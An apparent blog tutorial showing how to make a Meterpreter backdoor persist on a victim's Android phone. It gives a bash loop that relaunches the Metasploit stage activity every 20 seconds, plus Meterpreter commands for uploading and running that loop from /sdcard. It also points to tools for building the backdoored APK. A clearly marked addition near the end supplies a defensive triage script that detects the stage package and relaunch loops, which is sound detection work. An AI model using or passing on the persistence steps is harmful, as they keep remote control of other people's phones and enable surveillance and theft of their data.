Persistent Backdoor In Android Using Kali Linux With A Shell Script

Posted: June 19, 2020 in Android Tricks, Linux, Networking, Uncategorized

Hello guys, today we’re going to show you how hackers can create a persistent backdoor in android using Kali Linux after hacking with msfvenom.

You can use any of the methods above to hack the android device, but the meterpreter session you get is not persistent. To make it persistent, you need to upload a shell script to any location in the /sdcard directory.

Generally, your victim’s device is not rooted, so you can’t create any file in the /etc/init.d directory because of insufficient permissions. Instead, we use another method: upload a backdoor to the /sdcard directory using a shell command, then execute the script, which automatically makes a persistent backdoor on that android device.

Here are the steps which you need to follow:

The first required part is to get the meterpreter session. There are a lot of methods to build a backdoor .apk file, such as TheFatRat, msfvenom and spade, and you can use any of them to get the meterpreter session.

As soon as you get the meterpreter session, you need to create a (.sh) file and paste the following code into it:

#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

And save it as anyname.sh

Here’s the updated version of the above shell script, which is 100% compatible with all android versions:

#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

After that, you need to get into the root directory of the android device by typing “cd /” in the terminal.

Now you need to get into /sdcard location by typing “cd /sdcard” in the same terminal.

Here you can upload your backdoored script by typing “upload yeahhub-backdoor.sh” in the same terminal.

Now, all we have to do is execute the script once, and then everything will be done automatically, type “shell” to enter into system’s shell mode of android device.

Here you need to go into the same location again, i.e. cd /root/sdcard, and execute the backdoor using “sh yeahhub-backdoor.sh”.

In the above screenshot, as you can see, your script has been executed successfully, you can terminate the execution by pressing CTRL + C and then type Y.

You can test it by exiting from meterpreter and again setting up a Listener. You should get a meterpreter prompt automatically as shown in the above screen.

The persistence of the backdoor will only remain until a reboot of the android system. If your victim is on the same network, i.e. LAN, the persistence will remain forever on LAN, and if you have a static IP, your persistence will remain forever on WAN too.
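For anyone examining a device for the technique described above, the following is an added example, not part of the original post: a triage script that checks a collected package list for the package name the article's script uses and flags shell scripts that loop over `am start`. The function names, file names and sample evidence are constructed for illustration, and it assumes the package list and the scripts from /sdcard were already copied off the device.

```shell
#!/bin/sh
# Added defensive example: triage artifacts already collected from a device,
# e.g. `adb shell pm list packages` output and scripts pulled from /sdcard.
STAGE_PKG="com.metasploit.stage"   # package name used in the article's script

# True if a `pm list packages` dump lists the stage package.
has_stage_package() {
    grep -qxF "package:${STAGE_PKG}" "$1"
}

# True if a script combines a shell loop with an `am start ... -n pkg/activity` call.
is_relaunch_loop() {
    grep -Eq '^[[:space:]]*(while|until|for)[[:space:]]' "$1" || return 1
    grep -Eq '(^|[[:space:];])am[[:space:]]+start[[:space:]].*-n[[:space:]]+[^[:space:]]+/' "$1"
}

# Prints the component (pkg/activity) that the script keeps starting.
relaunch_target() {
    sed -nE 's#.*[[:space:]]-n[[:space:]]+([^[:space:]]+/[^[:space:]]+).*#\1#p' "$1" | head -n 1
}

# Usage: triage PACKAGE_LIST SCRIPT...   (prints one finding per line)
triage() {
    pkglist=$1; shift
    if has_stage_package "$pkglist"; then echo "package:${STAGE_PKG}"; fi
    for f in "$@"; do
        if is_relaunch_loop "$f"; then
            echo "relaunch-loop:$(basename "$f") -> $(relaunch_target "$f")"
        fi
    done
}

# Constructed sample evidence (not from a real device).
SAMPLES=$(mktemp -d)
printf 'package:com.android.chrome\npackage:com.metasploit.stage\n' > "$SAMPLES/packages.txt"
cat > "$SAMPLES/keepalive.sh" <<'EOF'
while :
do am start -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
EOF
cat > "$SAMPLES/backup.sh" <<'EOF'
for f in /sdcard/DCIM/*.jpg
do cp "$f" /sdcard/backup/
done
EOF

triage "$SAMPLES/packages.txt" "$SAMPLES"/*.sh
```

The loop check does not depend on the package name, so it still reports the relaunched component when the package-list check finds nothing.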

Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.

Posted by Shubham ;)
